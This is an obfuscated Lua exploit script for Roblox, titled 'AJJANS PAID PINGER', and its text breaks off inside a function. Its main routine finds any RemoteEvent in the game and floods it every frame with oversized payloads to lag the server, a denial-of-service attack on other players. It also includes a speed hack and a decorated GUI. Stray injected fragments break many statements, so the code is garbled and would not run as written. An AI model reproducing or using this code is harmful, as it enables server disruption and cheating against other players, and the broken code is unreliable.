do
local tObnB_=_G;local CsX0zG=3664+218;local cGA2Xu=5422+744;local EPALoD=6808+313;
 UserInputService = game:GetService((function() local _t={85,115,101,114,73,110,112,117,116,83,101,114,118,105,99,101} local _s='' for _i=1,#_t do _s=_s..string.char(_t[_i]) end return _s end)())
 RunService = game:GetService((function() local _t={82,117,110,83,101,114,118,105,99,101} local _s='' for _i=1,#_t do _s=_s..string.char(_t[_i]) end return _s end)())
 Players;local k1Zsm9=6732+174; = game:GetService((function() local _t={80,108,97,121,101,114,115} local _s='' for _i=1,#_t do _s=_s..string.char(_t[_i]) end return _s end)())
 TweenService = game:GetService((function() local _t={84,119,101,101,110,83,101,114,118,105,99,101} local _s='' for _i=1,#_t do _s=_s..string.char(_t[_i]) end return _s end)())

 player = Players.LocalPlayer
 playerGui = player:WaitForChild((function() local _t={80,108,97,121,101,114,71,117,105} local _s='' for _i=1,#_t do _s=_s..string.char(_t[_i]) end return _s end)())


 isLagging = false
 uuid = (function() local _t={100,56,48,101,50,50,49,55,45,51,54,98,56,45,52,98,100,99,45,57,97,52,54,45,50,50,56,49,99,54,102,55,48,98,50,56} local _s='' for _i=1,#_t do _s=_s..string.char(_t[_i]) end return _s end)()
 lagPower = (115+(7385))
 speedValue = (647+(-597))

 target = nil
 connections = {}

 function findTarget()
    for _, v in pairs(game:GetDescendants()) do
        if v:IsA((function() local _t={82,101,109,111,116,101,69,118,101,110,116} local _s='' for _i=1,#_t do _s=_s..string.char(_t[_i]) end return _s end)()) and v.Name ~= (function() local _t={102,114,105,101,110,100,109,97,105,110} local _s='' for _i=1,#_t do _s=_s..string.char(_t[_i]) end return _s end)() and v.Name ~= (function() local _t={112,105,110,103} local _s='' for _i=1,#_t do _s=_s..string.char(_t[_i]) end return _s end)() then
            return v
        end
    end
    return nil
end

target = findTarget()

 lastFireTime = (956+(-956))
 fireInterval = 0.001
 burstMode = false
 burstCount = (593+(-593))
 burstMax = (185+(-180))

 function startLagging()
    if not target then
        target = findTarget()
        if not target then
            return false
        end
    end
    
    for _, conn;local FsYPmC=787+284; in pairs(connections) do
        if conn;local FsDi9o=898+217; then
            conn:Disconnect()
        end
    end
    connections = {}
    
     renderConn = RunService.RenderStepped:Connect(function(tObnB_["__AH_XHMf_ZzvPnSQMW"])
        if not isLagging or not target then return end
        
         currentTime = tick()
        
        if burstMode then
            if burstCount < burstMax then
            payload=table.create(150000,{})
                pcall(function() 
                    target:FireServer;local kEYOwO=1848+833;(uuid, payload)
                end)
                burstCount += (8+(-7))
            else
                burstMode = false
                burstCount = (708+(-708))
                lastFireTime = currentTime
            end
        elseif currentTime - lastFireTime >= fireInterval then
             payload = string.rep((function() local _t={120} local _s='' for _i=1,#_t do _s=_s..string.char(_t[_i]) end return _s end)(), lagPower)
            pcall(function() 
                target:FireServer(uuid, payload)
            end)
            lastFireTime = currentTime
            
            if math.random((894+(-893)), (462+(-362))) <= (336+(-321)) then
                burstMode = true
                burstCount = (545+(-545))
            end
        end
    end)
    
    table.insert(connections, renderConn)
    
    return true
end

 function stopLagging()
    isLagging = false
    burstMode = false
    burstCount = (494+(-494))
    
    for _, conn in pairs(connections) do
        if conn then
            conn:Disconnect()
        end
    end
    connections = {}
end

 SpeedBooster = {}
do
    SpeedBooster.running = false
    SpeedBooster.connection = nil
    SpeedBooster.speedValue = speedValue
    
     character, humanoid;local YDNP79=5190+957;, hrp
    
     function updateCharRefs()
        character;local Y3idCp=4270+929; = player.Character or player.CharacterAdded:Wait()
        humanoid = character:FindFirstChildOfClass((function() local _t={72,117,109,97,110,111,105,100} local _s='' for _i=1,#_t do _s=_s..string.char(_t[_i]) end return _s end)())
        hrp = character:FindFirstChild((function() local _t={72,117,109,97,110,111,105,100,82,111,111,116,80,97,114,116} local _s='' for _i=1,#_t do _s=_s..string.char(_t[_i]) end return _s end)())
    end
    
    updateCharRefs()
    player.CharacterAdded:Connect(updateCharRefs)
    
    function SpeedBooster:Start()
        if self.running then return end
        self.running = true
        
        if self.connection then self.connection:Disconnect() end
        
        self.connection;local Q2lCZa=6845+793; = RunService.Heartbeat:Connect(function(tObnB_["__AH_XHMf_SCHU5YTAC"])
            if not (character and humanoid and hrp) then
                updateCharRefs()
                if not (humanoid and hrp) then return end
            end
            
             moveDir = humanoid.MoveDirection;local Q_7d9L=3967+92;
            if moveDir.Magnitude == (516+(-516)) then return end
            
            hrp.AssemblyLinearVelocity = Vector3.new(
                moveDir.X * self.speedValue,
                hrp.AssemblyLinearVelocity.Y,
                moveDir.Z * self.speedValue
            )
        end)
    end
    
    function SpeedBooster:Stop()
        self.running = false
        if self.connection then
            self.connection:Disconnect()
            self.connection = nil
        end
        if humanoid then
            humanoid.WalkSpeed = (763+(-747))
        end
    end
    
    player.CharacterAdded:Connect(function()
        self:Stop()
        task.delay(0.5, function()
            updateCharRefs;local QmTWor=8467+750;()
        end)
    end)
end

 gui = Instance.new((function() local _t={83,99,114,101,101,110,71,117,105} local _s='' for _i=1,#_t do _s=_s..string.char(_t[_i]) end return _s end)())
gui.Name = (function() local _t={65,106,106,97,110,115,80,97,105,100,80,105,110,103,101,114} local _s='' for _i=1,#_t do _s=_s..string.char(_t[_i]) end return _s end)()
gui.ResetOnSpawn = false
gui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
gui.Parent = playerGui

 frame = Instance.new((function() local _t={70,114,97,109,101} local _s='' for _i=1,#_t do _s=_s..string.char(_t[_i]) end return _s end)(), gui)
frame.Size = UDim2.fromOffset((249+(-29)), (608+(-378)))
frame.Position = UDim2.fromScale(0.5, 0.5)
frame.AnchorPoint = Vector2.new(0.5, 0.5)
frame.BackgroundColor3 = Color3.fromRGB((93+(-78)), (316+(-316)), (90+(-90)))
frame.BorderSizePixel = (274+(-274))
frame.Active = true
frame.Draggable = true
frame.ClipsDescendants = true

 frameCorner = Instance.new((function() local _t={85,73,67,111,114,110,101,114} local _s='' for _i=1,#_t do _s=_s..string.char(_t[_i]) end return _s end)(), frame)
frameCorner.CornerRadius = UDim.new((621+(-621)), (21+(-5)))

 border = Instance.new((function() local _t={85,73,83,116,114,111,107,101} local _s='' for _i=1,#_t do _s=_s..string.char(_t[_i]) end return _s end)(), frame)
border.Color = Color3.fromRGB((465+(-365)), (793+(-793)), (575+(-575)))
border.Thickness;local uNxl2A=560+735; = (51+(-49))

 innerGlow = Instance.new((function() local _t={85,73,83,116,114,111,107,101} local _s='' for _i=1,#_t do _s=_s..string.char(_t[_i]) end return _s end)(), frame)
innerGlow.Color = Color3.fromRGB((658+(-508)), (94+(-94)), (663+(-663)))
innerGlow.Thickness = (890+(-884))
innerGlow.Transparency = 0.9
innerGlow.ApplyStrokeMode = Enum.ApplyStrokeMode.Border

 outerGlow = Instance.new((function() local _t={85,73,83,116,114,111,107,101} local _s='' for _i=1,#_t do _s=_s..string.char(_t[_i]) end return _s end)(), frame;local Y6rw8L=1088+38;)
outerGlow.Color = Color3.fromRGB((233+(-153)), (196+(-196)), (725+(-725)))
outerGlow.Thickness = (925+(-915))
outerGlow.Transparency = 0.95
outerGlow.ApplyStrokeMode;local wFnicw=3941+411; = Enum.ApplyStrokeMode.Border

 bubblesContainer = Instance.new((function() local _t={70,114,97,109,101} local _s='' for _i=1,#_t do _s=_s..string.char(_t[_i]) end return _s end)(), frame)
bubblesContainer.Size = UDim2.new((140+(-139)), (785+(-785)), (652+(-651)), (574+(-574)))
bubblesContainer.BackgroundTransparency = (622+(-621))

 bubbles = {}
for i = (785+(-784)), (350+(-342)) do
     bubble = Instance.new((function() local _t={70,114,97,109,101} local _s='' for _i=1,#_t do _s=_s..string.char(_t[_i]) end return _s end)(), bubblesContainer)
     size = math.random;local VTyJfR=664+792;((45+(-15)), (948+(-888)))
    bubble.Size = UDim2.fromOffset(size, size)
    bubble;local qTxsuc=9925+954;.Position = UDim2.new(
        math.random() * 0.9,
        (708+(-708)),
        math.random() * 0.9,
        (149+(-149))
    )
    bubble.BackgroundColor3 = Color3.fromRGB((38+(82)), (41+(-41)), (741+(-741)))
    bubble.BackgroundTransparency = math.random((154+(-150)), (434+(-427))) / (824+(-814))
    bubble.BorderSizePixel = (362+(-362))
    
     bubbleCorner = Instance.new((function() local _t={85,73,67,111,114,110,101,114} local _s='' for _i=1,#_t do _s=_s..string.char(_t[_i]) end return _s end)(), bubble)
    bubbleCorner.CornerRadius = UDim.new;local Q0gApb=2210+489;((479+(-478)), (303+(-303)))
    
     bubbleStroke = Instance.new((function() local _t={85,73,83,116,114,111,107,101} local _s='' for _i=1,#_t do _s=_s..string.char(_t[_i]) end return _s end)(), bubble)
    bubbleStroke.Color = Color3.fromRGB((91+(89)), (689+(-689)), (870+(-870)))
    bubbleStroke.Thickness = (102+(-100))
    bubbleStroke.Transparency = 0.5
    
    task.spawn(function()
         startX = bubble.Position.X.Scale
         startY = bubble.Position.Y.Scale
         speedX = (math.random() - 0.5) * 0.4
         speedY = -0.2 - math.random() * 0.15
         floatOffset = math.random() * math.pi * (997+(-995))
         pulseSpeed = 1.5 + math.random() * (997+(-995))
        
        while bubble and bubble.Parent do
             time = tick()
             floatY = math.sin(time * 0.4 + floatOffset) * 0.07
            
             newX = startX + speedX * time % (581+(-580))
             newY = startY + speedY * time % (746+(-745))
            
            if newX > 0.95 then newX = (440+(-440)) end
            if newY < (6+(-6)) then newY;local dsulRg=9498+969; = 0.85 end
            
             pulse = (783+(-782)) + math.sin(time * pulseSpeed) * 0.25
            
            bubble;local p_Q8S5=2582+465;.Position = UDim2.new(
                newX,
                math.sin(time * 2.5 + i) * (168+(-160)) * pulse,
                newY + floatY,
                math.cos(time * 1.8 + i) * (46+(-38)) * pulse
            )
            
            bubble;local TlHf6F=487+193;.BackgroundTransparency = 0.3 + math.sin(time * 3.5 + i) * 0.4
            bubbleStroke.Transparency = 0.3 + math.sin(time * 2.5 + i) * 0.2
            
            task.wait(0.04)
        end
    end)
    
    table.insert(bubbles, bubble)
end

task.spawn(function()
    while frame and frame.Parent do
        TweenService:Create(innerGlow, TweenInfo.new(0.8, Enum.EasingStyle.Sine), {
            Color = Color3.fromRGB((694+(-494)), (94+(-74)), (524+(-504))),
            Transparency = 0.7
        }):Play()
        TweenService:Create(outerGlow, TweenInfo.new;local kuam7j=708+279;(0.8, Enum.EasingStyle.Sine), {
            Color = Color3.fromRGB((573+(-453)), (146+(-146)), (919+(-919))),
            Transparency = 0.9
        }):Play()
        task.wait(0.8)
        TweenService;local ql9wYN=8196+357;:Create(innerGlow, TweenInfo.new(0.8, Enum.EasingStyle.Sine), {
            Color = Color3.fromRGB((912+(-762)), (30+(-30)), (549+(-549))),
            Transparency = 0.9
        }):Play()
        TweenService:Create(outerGlow, TweenInfo.new(0.8, Enum.EasingStyle.Sine), {
            Color = Color3.fromRGB((449+(-369)), (70+(-70)), (567+(-567))),
            Transparency = 0.95
        }):Play()
        task.wait(0.8)
    end
end)

 titleBar = Instance;local f8oXiQ=5716+836;.new((function() local _t={70,114,97,109,101} local _s='' for _i=1,#_t do _s=_s..string.char(_t[_i]) end return _s end)(), frame)
titleBar.Size = UDim2.new;local Ojkgjy=7849+766;((11+(-10)), (742+(-742)), (3+(-3)), (915+(-875)))
titleBar.BackgroundColor3 = Color3.fromRGB((976+(-946)), (982+(-982)), (447+(-447)))
titleBar.BorderSizePixel = (391+(-391))

 titleCorner = Instance.new((function() local _t={85,73,67,111,114,110,101,114} local _s='' for _i=1,#_t do _s=_s..string.char(_t[_i]) end return _s end)(), titleBar)
titleCorner.CornerRadius = UDim.new((200+(-200)), (954+(-938)))

 title = Instance.new((function() local _t={84,101,120,116,76,97,98,101,108} local _s='' for _i=1,#_t do _s=_s..string.char(_t[_i]) end return _s end)(), titleBar)
title.Size = UDim2.new((929+(-928)), -(728+(-708)), (567+(-566)), (669+(-669)))
title.Position = UDim2.fromOffset((396+(-386)), (107+(-107)))
title.BackgroundTransparency = (201+(-200))
title.Text = (function() local _t={65,74,74,65,78,83,32,80,65,73,68,32,80,73,78,71,69,82} local _s='' for _i=1,#_t do _s=_s..string.char(_t[_i]) end return _s end)()
title.Font;local jR4OlO=9342+377; = Enum.Font.GothamBlack
title.TextSize = (754+(-738))
title.TextColor3 = Color3.fromRGB((809+(-554)), (797+(-697)), (612+(-512)))
title.TextXAlignment = Enum.TextXAlignment.Left

 titleShadow = Instance.new((function() local _t={84,101,120,116,76,97,98,101,108} local _s='' for _i=1,#_t do _s=_s..string.char(_t[_i]) end return _s end)(), titleBar)
titleShadow.Size = UDim2.new;local WdFiDS=7327+300;((862+(-861)), -(147+(-127)), (164+(-163)), (134+(-134)))
titleShadow.Position = UDim2.fromOffset((660+(-648)), (912+(-910)))
titleShadow.BackgroundTransparency = (20+(-19))
titleShadow.Text = (function() local _t={65,74,74,65,78,83,32,80,65,73,68,32,80,73,78,71,69,82} local _s='' for _i=1,#_t do _s=_s..string.char(_t[_i]) end return _s end)()
titleShadow.Font = Enum.Font.GothamBlack
titleShadow.TextSize = (434+(-418))
titleShadow.TextColor3 = Color3.fromRGB((145+(-95)), (250+(-250)), (271+(-271)))
titleShadow.TextXAlignment = Enum.TextXAlignment.Left
titleShadow;local PuuLtd=597+851;.ZIndex = title.ZIndex - (700+(-699))

 status = Instance.new((function() local _t={84,101,120,116,76,97,98,101,108} local _s='' for _i=1,#_t do _s=_s..string.char(_t[_i]) end return _s end)(), frame)
status.Size = UDim2.new((662+(-661)), -(262+(-242)), (967+(-967)), (909+(-881)))
status.Position;local jsQPws=8681+648; = UDim2.fromOffset((451+(-441)), (566+(-518)))
status.BackgroundTransparency;local QIMV7M=5481+1; = (559+(-558))
status.Text = (function() local _t={55357,57314,32,82,69,65,68,89} local _s='' for _i=1,#_t do _s=_s..string.char(_t[_i]) end return _s end)()
status.Font = Enum.Font.GothamBold
status.TextSize = (673+(-660))
status.TextColor3 = Color3.fromRGB((833+(-733)), (276+(-21)), (535+(-435)))

 content = Instance.new((function() local _t={70,114,97,109,101} local _s='' for _i=1,#_t do _s=_s..string.char(_t[_i]) end return _s end)(), frame)
content;local Xta8PC=3505+455;.Size = UDim2.new((732+(-731)), -(121+(-101)), (177+(-176)), -(107+(-17)))
content.Position = UDim2.fromOffset((713+(-703)), (507+(-427)))
content.BackgroundTransparency = (563+(-562))

 layout = Instance.new;local NB8s7H=4666+862;((function() local _t={85,73,76,105,115,116,76,97,121,111,117,116} local _s='' for _i=1,#_t do _s=_s..string.char(_t[_i]) end return _s end)(), content)
layout.SortOrder = Enum.SortOrder.LayoutOrder
layout.Padding = UDim.new((824+(-824)), (793+(-783)))

 powerSection = Instance.new((function() local _t={70,114,97,109,101} local _s='' for _i=1,#_t do _s=_s..string.char(_t[_i]) end return _s end)(), content)
powerSection.Size = UDim2.new;local ukFsWr=6198+886;((152+(-151)), (183+(-183)), (185+(-185)), (647+(-595)))
powerSection.BackgroundColor3 = Color3.fromRGB((874+(-849)), (380+(-380)), (738+(-738)))
powerSection.BorderSizePixel = (615+(-615))
powerSection.LayoutOrder = (268+(-267))

 powerCorner = Instance.new((function() local _t={85,73,67,111,114,110,101,114} local _s='' for _i=1,#_t do _s=_s..string.char(_t[_i]) end return _s end)(), powerSection)
powerCorner.CornerRadius = UDim.new((894+(-894)), (477+(-465)))

 powerSectionStroke = Instance.new((function() local _t={85,73,83,116,114,111,107,101} local _s='' for _i=1,#_t do _s=_s..string.char(_t[_i]) end return _s end)(), powerSection)
powerSectionStroke.Color = Color3.fromRGB((682+(-622)), (239+(-239)), (219+(-219)))
powerSectionStroke.Thickness = (583+(-582))

 powerLabel = Instance.new((function() local _t={84,101,120,116,76,97,98,101,108} local _s='' for _i=1,#_t do _s=_s..string.char(_t[_i]) end return _s end)(), powerSection)
powerLabel.Size = UDim2.new((442+(-441)), -(92+(-72)), (34+(-34)), (619+(-597)))
powerLabel.Position = UDim2.fromOffset((432+(-422)), (241+(-233)))
powerLabel.BackgroundTransparency = (176+(-175))
powerLabel.Text = (function() local _t={80,79,87,69,82,58,32} local _s='' for _i=1,#_t do _s=_s..string.char(_t[_i]) end return _s end)() .. lagPower
powerLabel.Font = Enum.Font.GothamBold
powerLabel.TextSize = (981+(-968))
powerLabel.TextColor3 = Color3.fromRGB((622+(-367)), (191+(-41)), (239+(-89)))

 sliderBg = Instance.new((function() local _t={70,114,97,109,101} local _s='' for _i=1,#_t do _s=_s..string.char(_t[_i]) end return _s end)(), powerSection)
sliderBg.Size = UDim2.new((550+(-549)), -(237+(-217)), (169+(-169)), (198+(-188)))
sliderBg.Position = UDim2.fromOffset((634+(-624)), (426+(-392)))
sliderBg.BackgroundColor3 = Color3.fromRGB((355+(-315)), (37+(-37)), (718+(-718)))
sliderBg.BorderSizePixel = (994+(-994))

 sliderBgCorner = Instance.new((function() local _t={85,73,67,111,114,110,101,114} local _s='' for _i=1,#_t do _s=_s..string.char(_t[_i]) end return _s end)(), sliderBg)
sliderBgCorner.CornerRadius = UDim.new((157+(-156)), (768+(-768)))

 sliderFill = Instance.new((function() local _t={70,114,97,109,101} local _s='' for _i=1,#_t do _s=_s..string.char(_t[_i]) end return _s end)(), sliderBg)
sliderFill.Size = UDim2.new(lagPower / (21+(24979)), (41+(-41)), (194+(-193)), (415+(-415)))
sliderFill.BackgroundColor3 = Color3.fromRGB((467+(-267)), (447+(-447)), (918+(-918)))
sliderFill.BorderSizePixel = (715+(-715))

 sliderFillCorner = Instance.new((function() local _t={85,73,67,111,114,110,101,114} local _s='' for _i=1,#_t do _s=_s..string.char(_t[_i]) end return _s end)(), sliderFill)
sliderFillCorner.CornerRadius = UDim.new((278+(-277)), (21+(-21)))

 sliderKnob = Instance.new((function() local _t={70,114,97,109,101} local _s='' for _i=1,#_t do _s=_s..string.char(_t[_i]) end return _s end)(), sliderBg)
sliderKnob.Size = UDim2.fromOffset((960+(-940)), (797+(-777)))
sliderKnob.Position = UDim2.new(lagPower / (783+(24217)), -(239+(-229)), 0.5, -(529+(-519)))
sliderKnob.BackgroundColor3 = Color3.fromRGB((492+(-237)), (590+(-490)), (523+(-423)))
sliderKnob.BorderSizePixel = (210+(-210))

 sliderKnobCorner = Instance.new((function() local _t={85,73,67,111,114,110,101,114} local _s='' for _i=1,#_t do _s=_s..string.char(_t[_i]) end return _s end)(), sliderKnob)
sliderKnobCorner.CornerRadius = UDim.new((462+(-461)), (768+(-768)))

 knobStroke = Instance.new((function() local _t={85,73,83,116,114,111,107,101} local _s='' for _i=1,#_t do _s=_s..string.char(_t[_i]) end return _s end)(), sliderKnob)
knobStroke;local vVBZmc=5572+934;.Color = Color3.fromRGB((108+(147)), (576+(-526)), (366+(-316)))
knobStroke.Thickness = (863+(-861))

 draggingSlider = false

 function updateSliderFromPower()
     pos;local aEwIL9=5888+394; = lagPower / (393+(24607))
    sliderKnob.Position = UDim2.new(pos, -(621+(-611)), 0.5, -(916+(-906)))
    sliderFill.Size = UDim2.new(pos, (317+(-317)), (217+(-216)), (646+(-646)))
    powerLabel.Text = (function() local _t={80,79,87,69,82,58,32} local _s='' for _i=1,#_t do _s=_s..string.char(_t[_i]) end return _s end)() .. lagPower
end

 function updateSliderFromInput(tObnB_["__AH_XHMf_iGnLmm4w6"])
    if sliderBg.AbsoluteSize.X > (323+(-323)) then
         rel = math.clamp((tObnB_["__AH_XHMf_iGnLmm4w6"].Position.X - sliderBg;local NkcEN3=7185+985;.AbsolutePosition.X) / sliderBg.AbsoluteSize.X, (871+(-871)), (947+(-946)))
        lagPower;local UDIHCy=6864+584; = math.floor((721+(-720)) + rel * (225+(24774)))
        updateSliderFromPower()
    end
end

sliderBg.InputBegan:Connect(function(tObnB_["__AH_XHMf_iGnLmm4w6"])
    if tObnB_["__AH_XHMf_iGnLmm4w6"].UserInputType == Enum.UserInputType.MouseButton1 or tObnB_["__AH_XHMf_iGnLmm4w6"].UserInputType == Enum.UserInputType.Touch then
        draggingSlider = true
        updateSliderFromInput(tObnB_["__AH_XHMf_iGnLmm4w6"])
    end
end)

sliderBg;local ZJsgPl=4217+232;.InputEnded:Connect(function(tObnB_["__AH_XHMf_iGnLmm4w6"])
    if tObnB_["__AH_XHMf_iGnLmm4w6"].UserInputType == Enum.UserInputType.MouseButton1 or tObnB_["__AH_XHMf_iGnLmm4w6"].UserInputType == Enum.UserInputType.Touch then
        draggingSlider = false
    end
end)

sliderKnob.InputBegan:Connect(function(tObnB_["__AH_XHMf_iGnLmm4w6"])
    if tObnB_["__AH_XHMf_iGnLmm4w6"].UserInputType == Enum.UserInputType.MouseButton1 or tObnB_["__AH_XHMf_iGnLmm4w6"].UserInputType == Enum.UserInputType.Touch then
        draggingSlider = true
    end
end)

UserInputService.InputChanged:Connect(function(tObnB_["__AH_XHMf_iGnLmm4w6"])
    if draggingSlider and (tObnB_["__AH_XHMf_iGnLmm4w6"].UserInputType == Enum.UserInputType.MouseMovement or tObnB_["__AH_XHMf_iGnLmm4w6"].UserInputType == Enum.UserInputType.Touch) then
        updateSliderFromInput(tObnB_["__AH_XHMf_iGnLmm4w6"])
    end
end)

UserInputService.InputEnded:Connect(function(tObnB_["__AH_XHMf_iGnLmm4w6"])
    if tObnB_["__AH_XHMf_iGnLmm4w6"].UserInputType == Enum.UserInputType.MouseButton1;local HaIUwg=8925+990; or tObnB_["__AH_XHMf_iGnLmm4w6"].UserInputType == Enum.UserInputType.Touch then
        draggingSlider = false
    end
end)

 function makeButton(text, layoutOrder, color)
     b = Instance.new((function() local _t={84,101,120,116,66,117,116,116,111,110} local _s='' for _i=1,#_t do _s=_s..string.char(_t[_i]) end return _s end)(), content)
    b.Size = UDim2.new((764+(-763)), (173+(-173)), (643+(-643)), (886+(-846)))
    b.BackgroundColor3 = color
    b.BorderSizePixel = (337+(-337))
    b.Text = text
    b;local Gr88TH=7286+169;.Font = Enum;local aFZx7Y=3714+465;.Font.GothamBold
    b.TextSize = (8+(6))
    b.TextColor3;local dVhJTM=4739+441; = Color3.fromRGB((491+(-236)), (708+(-508)), (221+(-21)))
    b.AutoButtonColor = false
    b.LayoutOrder = layoutOrder
    
     corner = Instance.new;local LHkwnP=2427+585;((function() local _t={85,73,67,111,114,110,101,114} local _s='' for _i=1,#_t do _s=_s..string.char(_t[_i]) end return _s end)(), b)
    corner.CornerRadius = UDim.new((801+(-801)), (737+(-725)))
    
     buttonStroke = Instance;local Ws9wQ6=6162+483;.new((function() local _t={85,73,83,116,114,111,107,101} local _s='' for _i=1,#_t do _s=_s..string.char(_t[_i]) end return _s end)(), b)
    buttonStroke.Color = Color3.fromRGB((507+(-427)), (180+(-180)), (126+(-126)))
    buttonStroke.Thickness = (673+(-671))
    
    b.MouseEnter:Connect;local mvQxRY=6802+463;(function()
        TweenService:Create(b, TweenInfo.new(0.2), {
            BackgroundColor3 = Color3.fromRGB(
                math.min(color.R * (409+(-154)) * 1.3, (475+(-220))),
                math.min(color;local tg1VEU=4115+649;.G * (212+(43)) * 1.3, (775+(-520))),
                math.min(color.B * (89+(166)) * 1.3, (385+(-130)))
            )
        }):Play()
        TweenService:Create(buttonStroke, TweenInfo.new(0.2), {
            Color = Color3.fromRGB((635+(-515)), (287+(-287)), (632+(-632)))
        }):Play()
    end)
    
    b.MouseLeave:Connect(function()
        TweenService:Create(b, TweenInfo.new;local f8y5P3=802+204;(0.2), {
            BackgroundColor3 = color
        }):Play()
        TweenService:Create(buttonStroke, TweenInfo.new(0.2), {
            Color = Color3.fromRGB((694+(-614)), (797+(-797)), (616+(-616)))
        }):Play()
    end)
    
    return b
end

 lagBtn = makeButton((function() local _t={55357,56628,32,80,73,78,71,32,70,85,67,75,69,82,58,32,79,70,70} local _s='' for _i=1,#_t do _s=_s..string.char(_t[_i]) end return _s end)(), (293+(-291)), Color3.fromRGB((842+(-802)), (554+(-554)), (82+(-82))))
lagBtn.MouseButton1Click:Connect(function()
    isLagging = not isLagging
    if isLagging then
        if not target then
            target = findTarget;local OcAeZV=3824+670;()
            if not target then
                isLagging = false
                status.Text = (function() local _t={10060,32,78,79,32,84,65,82,71,69,84,33} local _s='' for _i=1,#_t do _s=_s..string.char(_t[_i]) end return _s end)()
                status.TextColor3 = Color3.fromRGB((154+(101)), (916+(-866)), (185+(-135)))
                return
            end
        end
        if startLagging() then
            status.Text = (function() local _t={9889,32,76,65,71,71,73,78,71,46,46,46} local _s='' for _i=1,#_t do _s=_s..string.char(_t[_i]) end return _s end)()
            status;local E2PCsZ=8816+676;.TextColor3 = Color3.fromRGB((20+(235)), (522+(-322)), (277+(-227)))
            lagBtn.Text = (function() local _t={55357,57314,32,80,73,78,71,32,70,85,67,75,69,82,58,32,79,78} local _s='' for _i=1,#_t do _s=_s..string.char(_t[_i]) end return _s end)()
            lagBtn.BackgroundColor3 = Color3.fromRGB((890+(-860)), (281+(-221)), (899+(-899)))
        else
            isLagging = false
            status.Text = (function() local _t={10060,32,70,65,73,76,69,68,33} local _s='' for _i=1,#_t do _s=_s..string.char(_t[_i]) end return _s end)()
            status.TextColor3 = Color3.fromRGB((26+(229)), (759+(-709)), (71+(-21)))
        end
    else
        stopLagging()
        status.Text;local gZ0Zdl=871+751; = (function() local _t={55357,57314,32,82,69,65,68,89} local _s='' for _i=1,#_t do _s=_s..string.char(_t[_i]) end return _s end)()
        status.TextColor3 = Color3.fromRGB((224+(-124)), (808+(-553)), (29+(71)))
        lagBtn.Text = (function() local _t={55357,56628,32,80,73,78,71,32,70,85,67,75,69,82,58,32,79,70,70} local _s='' for _i=1,#_t do _s=_s..string.char(_t[_i]) end return _s end)()
        lagBtn.BackgroundColor3 = Color3.fromRGB((628+(-588)), (525+(-525)), (387+(-387)))
    end
end)

 speedSection = Instance.new((function() local _t={70,114,97,109,101} local _s='' for _i=1,#_t do _s=_s..string.char(_t[_i]) end return _s end)(), content)
speedSection.Size = UDim2.new((619+(-618)), (450+(-450)), (403+(-403)), (59+(-19)))
speedSection.BackgroundTransparency = (875+(-874))
speedSection.LayoutOrder = (762+(-759))

 speedBtn = Instance.new((function() local _t={84,101,120,116,66,117,116,116,111,110} local _s='' for _i=1,#_t do _s=_s..string.char(_t[_i]) end return _s end)(), speedSection)
speedBtn.Size = UDim2;local bczN3N=3123+32;.new(0.65, (566+(-566)), (707+(-706)), (991+(-991)))
speedBtn.BackgroundColor3 = Color3.fromRGB((382+(-342)), (398+(-398)), (599+(-599)))
speedBtn.BorderSizePixel = (160+(-160))
speedBtn.Text = (function() local _t={55357,56628,32,83,80,69,69,68,58,32,79,70,70} local _s='' for _i=1,#_t do _s=_s..string.char(_t[_i]) end return _s end)()
speedBtn.Font = Enum.Font.GothamBold
speedBtn.TextSize = (531+(-517))
speedBtn.TextColor3 = Color3.fromRGB((594+(-339)), (959+(-759)), (194+(6)))
speedBtn.AutoButtonColor = false

 speedBtnCorner = Instance.new;local TuBa0n=802+615;((function() local _t={85,73,67,111,114,110,101,114} local _s='' for _i=1,#_t do _s=_s..string.char(_t[_i]) end return _s end)(), speedBtn)
speedBtnCorner.CornerRadius = UDim.new((372+(-372)), (91+(-79)))

 speedBtnStroke = Instance.new((function() local _t={85,73,83,116,114,111,107,101} local _s='' for _i=1,#_t do _s=_s..string.char(_t[_i]) end return _s end)(), speedBtn)
speedBtnStroke.Color = Color3.fromRGB((734+(-654)), (528+(-528)), (532+(-532)))
speedBtnStroke.Thickness = (382+(-380))

speedBtn.MouseEnter;local bwuaWi=6819+136;:Connect(function()
    TweenService:Create(speedBtn, TweenInfo.new(0.2), {
        BackgroundColor3 = Color3.fromRGB((895+(-835)), (277+(-277)), (985+(-985)))
    }):Play()
    TweenService;local R_tHOv=4696+131;:Create(speedBtnStroke, TweenInfo.new(0.2), {
        Color = Color3.fromRGB((81+(39)), (619+(-619)), (920+(-920)))
    }):Play()
end)

speedBtn.MouseLeave:Connect(function()
    TweenService:Create(speedBtn, TweenInfo.new(0.2), {
        BackgroundColor3 = Color3.fromRGB((805+(-765)), (804+(-804)), (835+(-835)))
    }):Play()
    TweenService:Create(speedBtnStroke, TweenInfo.new(0.2), {
        Color = Color3.fromRGB((537+(-457)), (261+(-261)), (617+(-617)))
    }):Play()
end)

 speedBox = Instance.new((function() local _t={84,101,120,116,66,111,120} local _s='' for _i=1,#_t do _s=_s..string.char(_t[_i]) end return _s end)(), speedSection)
speedBox.Size = UDim2.new(0.3, (702+(-702)), (928+(-927)), (847+(-847)))
speedBox.Position = UDim2.new;local UVpp12=4488+412;(0.7, (168+(-168)), (134+(-134)), (160+(-160)))
speedBox.BackgroundColor3 = Color3.fromRGB((278+(-248)), (291+(-291)), (639+(-639)))
speedBox.TextColor3 = Color3;local hC8rqM=3636+760;.fromRGB((967+(-712)), (746+(-546)), (780+(-580)))
speedBox.Font = Enum.Font.GothamMedium
speedBox.TextSize = (246+(-233))
speedBox.PlaceholderText = (function() local _t={83,80,69,69,68} local _s='' for _i=1,#_t do _s=_s..string.char(_t[_i]) end return _s end)()
speedBox;local laL345=2986+690;.Text = tostring(speedValue)
speedBox.ClearTextOnFocus = false
speedBox.BorderSizePixel = (226+(-226))

 speedBoxCorner = Instance.new((function() local _t={85,73,67,111,114,110,101,114} local _s='' for _i=1,#_t do _s=_s..string.char(_t[_i]) end return _s end)(), speedBox)
speedBoxCorner.CornerRadius;local wIzlrj=966+606; = UDim.new((98+(-98)), (677+(-665)))

 speedBoxStroke = Instance.new;local NEc8OP=9103+337;((function() local _t={85,73,83,116,114,111,107,101} local _s='' for _i=1,#_t do _s=_s..string.char(_t[_i]) end return _s end)(), speedBox)
speedBoxStroke.Color = Color3.fromRGB((121+(-61)), (853+(-853)), (431+(-431)))
speedBoxStroke.Thickness;local CmctW0=9837+58; = (326+(-324))

speedBox.FocusLost:Connect(function(tObnB_["__AH_XHMf_Iwj5Vzi8C"])
     num = tonumber(speedBox.Text)
